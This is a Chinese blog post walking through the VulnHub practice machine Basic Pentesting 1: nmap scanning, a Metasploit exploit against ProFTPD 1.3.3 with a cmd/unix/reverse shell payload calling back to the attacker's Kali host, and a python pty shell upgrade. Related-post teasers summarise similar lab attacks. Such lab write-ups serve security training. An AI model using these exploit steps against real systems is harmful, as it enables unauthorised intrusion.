Basic-penetration靶机

最新推荐文章于 2025-02-03 00:40:31 发布
最新推荐文章于 2025-02-03 00:40:31 发布
阅读量227 收藏
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zdd1453691081/article/details/140906336
版权

信息收集:

靶机地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/#download

(1)ip扫描

nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:A3:86:A0'

(2)端口扫描

nmap -p- -A 192.168.254.138

getshell:

(1)根据服务版本搜索相关漏洞,在kali输入 msfconsole命令,进入到该框架内

(2)先看看可以利用的脚本,输入 search proftpd 1.3.3(为什么是proftpd 1.3.3,因为之前探测到是这个版本)

search proftpd 1.3.3

(3)由上图,我们进入利用的脚本,选择用序号2的那一个:use 2;

(4)然后查看要设置的参数(show options)

set payload  cmd/unix/reverse
set rhosts 192.168.254.138      #靶机ip
set lhost 192.168.254.129       #kali的ip
run

提权:

(1)查看当前用户拥有的权限:sudo -l,发现当前用户已经是root

(2)优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行)

python3 -c 'import pty;pty.spawn("/bin/bash")'

Basic-penetration靶机渗透测试
weixin_58786230的博客
08-04 337
【代码】Basic-penetration靶机渗透测试。
DC-1靶机教程
qq_42553928的博客
04-07 5769
1.明确目标 DC:1 下载地址 https ://download.vulnhub.com/dc/DC-1.zip 2.信息收集 2.1被动信息收集 2.1.1DC:1网页信息收集 https://www.vulnhub.com/entry/dc-1,292/ Description Back to the Top DESCRIPTION DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in
Vulnhub靶机basic_pentesting_1
qq_48904485的博客
02-29 621
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机basic_pentesting_1(10.0.2.6)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/
Vulnhub靶机 Basic penetration(渗透测试详解)
2301_78721909的博客
08-03 232
使用searchsploit工具搜索该版本的历史漏洞,发现存在命令执行漏洞。根据nmap的扫描结果发现ftp的版本为。2、对靶机IP进行主机发现和端口扫描。发现开放了21、22、80端口。成功获取root权限。
BASIC-PENTESTING-1 靶机提权
weixin_41082546的博客
08-11 1355
basic-pentesting-1 https://www.vulnhub.com/entry/basic-pentesting-1,216/ 获取ip地址 端口扫描,服务识别 根据服务版本搜索相关漏洞 通过查看漏洞利用代码我们知道该漏洞利用模块在msf中已有 于是使用msf 搜索漏洞模块并利用 use exploit/unix/ftp/proftpd...
靶机渗透练习69-DC1
hirak0的博客
04-21 1709
靶机描述 靶机地址:http://www.vulnhub.com/entry/dc-1,292/ Description DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. It was designed to be a challenge for beginners, but just how easy it is will
vulnhub DC-3 靶机 walkthrough
Bulestardemon的博客
02-01 905
扫描主机,确定 ip 和 版本,服务信息。访问 web 服务,指纹识别,目录扫描。查找 cms joomla 漏洞,sqlmap 打了一发,以 admin 登录后台。找到文件上传或者修改点,部署 exp.php 反弹shell。获取 shell,查看内核和操作系统发行版本。找到 ubuntu 16.04 权限提升漏洞,获得 root。
vulnhub DC-5 靶机 walkthrough
Bulestardemon的博客
02-03 748
扫描主机 ip,端口和服务信息。访问网页,扫描目录,看到多个参数提交点,wfuzz 测试参数找到 file。LFI 本地文件包含加 nginx 日志投毒反弹shell。查找到 suid 位文件 screen 4.5.0,目标机执行exp获得 root。
渗透测试综合靶场 DC-2 通关详解
goldfish8848的博客
09-18 1581
DC-2与DC-1的渗透步骤有一些相似之处,但也存在一些区别。靶机发现与IP解析DC-2:发现靶机真实IP后,需要修改hosts文件以解析域名到IP地址,因为直接访问IP时域名解析失败。DC-1:没有提到需要修改hosts文件,直接通过IP进行渗透测试。端口探测DC-2:探测到除了常见的80端口外,还有一个7744端口开放。DC-1:主要提到了22和80端口,没有提到7744端口。网站配置与访问DC-2:需要修改hosts文件后才能访问网站,且网站是基于WordPress的。
靶机渗透测试:basic_pentesting_1靶机提权
x_13579的博客
04-13 1043
靶场提权
靶机渗透练习70-DC2
hirak0的博客
04-21 757
靶机描述 靶机地址:http://www.vulnhub.com/entry/dc-2,311/ Description Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with beginners
basic_pentesting_1靶场实战[超详细]
weixin_68615160的博客
08-05 934
无可用信息,我们想起来之前扫描端口信息的时候,开启的ftp服务版本貌似有漏洞。ip地址为192.168.121.186,开启了21、22、80端口。攻击成功,成功拿到root权限,省了提权这一步。再次查看配置信息,发现还需要设置监听地址。设置RHOSTS为靶机ip地址。使用msfconsole查看。访问一下80web服务看看。使用第五个,1.3.3c。我们设置为kali的ip。提示没有添加任何内容。网卡模式设置为nat。
Vulnhub靶场渗透-basic_pentesting_1
paidx0
09-22 805
前言 靶机ip(192.168.110.134) 攻击机ip(192.168.110.127) 网络NAT模式 这次的靶场比较简单,却绕了挺大弯的 信息收集 找到隐藏页 简单翻了一下也没啥可以利用的东西,继续扫隐藏页目录 找到一些看似有用其实没啥用的东西,比如WordPress的登录页,文件包含页 这全都是误导,显然我被骗了,一直在爆破登录页和一个一个文件的看,文件数量太多了浪费很多时间 正确解法 重新回到nmap,这次不偷懒,更详细的扫描一下服务的版本号 nmap -A -v 192.168
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8723
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
东财1109考试批次《工程项目管理》复习题.pdf
06-13
东财1109考试批次《工程项目管理》复习题.pdf
中国互联网络热点调查报告.docx
06-13
中国互联网络热点调查报告.docx
农业电商服务系统_30249--论文.zip
06-13
java+mysql源代码+配套文档+数据库+答辩教程
铁路订票平台小程序pf.zip
最新发布
06-13
java+mysql源代码+配套文档+数据库+答辩教程
openeuler 虚拟机:Nginx 日志分析脚本
06-13
openeuler 虚拟机:Nginx 日志分析脚本
penetration2d-ale.k
10-01
penetration2d-ale.k是一种基于ALE(Arbitrary Lagrangian Eulerian)方法的二维穿透模拟算法。在计算机图形学中,穿透是指当两个物体在进行碰撞时,有一部分或全部的物体穿过了另一个物体。 penetration2d-ale.k的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值